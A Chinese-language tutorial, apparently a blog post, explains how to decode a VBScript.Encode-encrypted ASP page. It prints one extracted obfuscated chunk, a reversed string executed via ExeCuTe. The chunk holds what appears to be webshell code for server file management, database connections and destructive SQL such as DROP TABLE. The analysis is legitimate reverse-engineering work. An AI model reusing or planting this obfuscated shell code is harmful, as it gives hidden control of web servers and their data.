首先这是一个VBScript.Encode加密,微软的screnc.exe加密兼容性好。这个解密网上有很多在线解密的工具,用VBscript.Encode 解码器解密就行,但是要注意特殊字符的处理。
VBScript.Encode解密之后看上去还是一堆乱码,但是这时候可以发现很多函数代码已经出来了。仔细查看可以看到这个是自定义函数加密,然后通过ExeCuTe解密代码执行。
一般的加密页面有静态加密页面和动态加密页面,如果是动态加密页面,那么一般需要架设iis来进行解密。以本第一处加密代码来说。在vbs加密中英文的冒号(:)是代码的连接符,相当于回车符号。那么第一处加密代码我们可以这样提取:
UZSS = NewStr:End Function:ShiSan="↙>↙ srr∞↙on=llorcs ↙ SRR neht ↙↙=noitcA fI∞ ↙ydob<↙ srr∞↙>tpircs/<↙SRR∞↙};eurt nruter;)(timbus.mroFbD;↙↙↙↙=LMTHrenni.cba;gp = eulav.egaP.mroFbD;rts = eulav.rtSlqS.mroFbD};eslaf nruter;)↙↙!确正否是句语LQS查检请↙↙(trela{)01<htgnel.rts(fi};eslaf nruter;)↙↙!确正否是串接连库据数查检请 ↙↙(trela{)5<htgnel.eulav.rtSbD.mroFbD(fi{)gp,rts(rtSlqSlluF noitcnuf↙SRR∞↙};eurt nruter};]i[rtS = eulav.rtSlqS.mroFbD{esle};)]i[rtS(trela{)21==i(fi esle};↙↙>retnec/<。句语令命作操LQS入输再库据数接连己认确请>retnec<↙↙=LMTHrenni.cba;↙↙↙↙ = eulav.rtSlqS.mroFbD;]i[rtS = eulav.rtSbD.mroFbD{)3=<i(fi;↙↙。节字个十五前的段字示显只据数条一过超n.现实询查制控件条用可,节字部全的段字示显可即时据数条一示显只当↙↙ =]21[rtS;↙↙SSAP NMULOC PORD ]emaNelbaT[ ELBAT RETLA↙↙ =]11[rtS;↙↙)23(RAHCRAV SSAP NMULOC DDA ]emaNelbaT[ ELBAT RETLA↙↙ =]01[rtS;↙↙]emaNelbaT[ ELBAT PORD↙↙ = ]9[rtS;↙↙))05(RAHCRAV RESU,LLUN TON )1,1( YTITNEDI TNI DI(]emaNelbaT[ ELBAT ETAERC↙↙ = ]8[rtS;↙↙001=DI EREHW 'emanresu'=RESU TES ]emaNelbaT[ ETADPU↙↙ = ]7[rtS;↙↙001=DI EREHW ]emaNelbaT[ MORF ETELED↙↙ = ]6[rtS;↙↙)'drowssap','emanresu'(SEULAV )SSAP,RESU(]emaNelbaT[ OTNI TRESNI↙↙ = ]5[rtS;↙↙001<DI EREHW ]emaNelbaT[ MORF * TCELES↙↙ = ]4[rtS;↙↙emaNnsD=nsD↙↙ = ]3[rtS;↙↙****=dwP;toor=diU;emaNbD=esabataD;6033=troP;↙&PIrevreS&↙=revreS;}lqSyM{=revirD↙↙ = ]2[rtS;↙↙****=dwP;as=diU;emaNbD=esabataD;3341,↙&PIrevreS&↙=revreS;}revreS lqS{=revirD↙↙ = ]1[rtS;↙↙***=drowssaP esabataD:BDELO teJ;bdm.bd↙&))↙htaPredloF↙(noisseS(htaPeR&↙=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP↙↙ = ]0[rtS;)21(yarrA wen = rtS};eslaf nruter{)0<i(fi{)i(rtSbDlluF noitcnuf↙SRR∞↙};eurt nruter};eslaf nruter;)0(rtSbDlluF;)↙↙库据数接连先请↙↙(trela{)↙↙↙↙ == eulav.rtSbD.mroFbD(fi{)(kcehCbD noitcnuf↙SRR∞↙}};↙↙↙↙ = eulav.emaNF.mrofedih.pot{esle};)(timbus.mrofedih.pot;noitcAF = eulav.noitcA.mrofedih.pot{)llun=!emaND(fi};↙↙rehtO↙↙ = emaND{esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,↙↙!在存否是件文意注,称名全件文bdM的缩压要入输请↙↙(tpmorp = emaND{)↙↙bdMtcapmoC↙↙==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,↙↙!名同能不意注,称名全件文bdM的建新要入输请↙↙(tpmorp = emaND{)↙↙bdMetaerC↙↙==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全夹件文的建新要入输请↙↙(tpmorp = emaND{)↙↙redloFweN↙↙==noitcAF(fi esle};emaND+↙↙||||↙↙ =+ eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全夹件文标目到动移入输请↙↙(tpmorp = emaND{)↙↙redloFevoM↙↙==noitcAF(fi esle};emaND+↙↙||||↙↙ =+ eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全夹件文标目到动移入输请↙↙(tpmorp = emaND{)↙↙redloFypoC↙↙==noitcAF(fi esle};emaND+↙↙||||↙↙ =+ eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全件文标目到动移入输请↙↙(tpmorp = emaND{)↙↙eliFevoM↙↙==noitcAF(fi esle};emaND+↙↙||||↙↙ =+ eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全件文标目到制复入输请↙↙(tpmorp = emaND{)↙↙eliFypoC↙↙==noitcAF(fi;emaNF = eulav.emaNF.mrofedih.pot{)noitcAF,emaNF(mroFlluF noitcnuf↙SRR∞↙};)(timbus.mrofrdda.pot;redloF = eulav.htaPredloF.mrofrdda.pot{)redloF(redloFwohS noitcnuf↙SRR∞↙;)(kcolCnur};yalpsid+↙↙-- ↙&DA&↙→↙↙=sutats.wodniw;)(gnirtSelacoLot.yadot =yalpsid rav;)(etaD wen = yadot rav;)001 ,↙↙)(kcolCnur↙↙(tuoemiTtes.wodniw = emiTeht{)(kcolCnur noitcnuf↙SRR∞↙};eslaf nruter esle;eurt nruter))↙↙?吗作操此行执要认确↙↙(mrifnoc( fi{)(kosey noitcnuf↙SRR∞↙;srorrEllik=rorreno.wodniw};eurt nruter{)(srorrEllik noitcnuf>tpircsavaj=egaugnal tpircs<↙SRR∞↙>elyts/<↙SRR∞↙};xp11:ezis-tnof;888#:roloc{ma.↙SRR∞↙}000#:dnuorgkcab;der:roloc{revoh:a};enon :noitaroced-txet;ddd#:roloc{a↙SRR∞↙}000000# :ROLOC-ESAB-RABLLORCS;cfcf00# :ROLOC-WODAHSKRAD-RABLLORCS;000000# :ROLOC-KCART-RABLLORCS;cfcf00# :ROLOC-WORRA-RABLLORCS;cfcf00# :ROLOC-WODAHS-RABLLORCS;cfcf00# :ROLOC-THGILHGIH-RABLLORCS;000000# :ROLOC-ECAF-RABLLORCS{ YDOB↙SRR∞↙};xp4:tfel-nigram;xp0 :nigram{ydob↙SRR∞↙}FFF#:roloc;000#:roloc-dnuorgkcab{dmc.↙SRR∞↙}xp0:redrob;000000#:roloc-dnuorgkcab{C.↙SRR∞↙}fff# dilos xp1:redrob;↙&udub&↙:roloc-dnuorgkcab;xp21 :ezis-tnof{aeratxet,tceles,tupni↙SRR∞↙};↙&zw&↙:roloc;↙&jb&↙:roloc-dnuorgkcab;xp21 :ezis-tnof{dt,ydob↙SRR∞↙>↙↙ssc/txet↙↙=epyt elyts<↙SRR∞↙>eltit/< ↙&PIrevreS&↙ - ↙&emaNm&↙>eltit<↙SRR∞↙>↙↙2132bg=tesrahc ;lmth/txet↙↙=tnetnoc ↙↙epyT-tnetnoC↙↙=viuqe-ptth atem<>lmth<↙SRR":ExeCuTe(UZSS(ShiSan)):
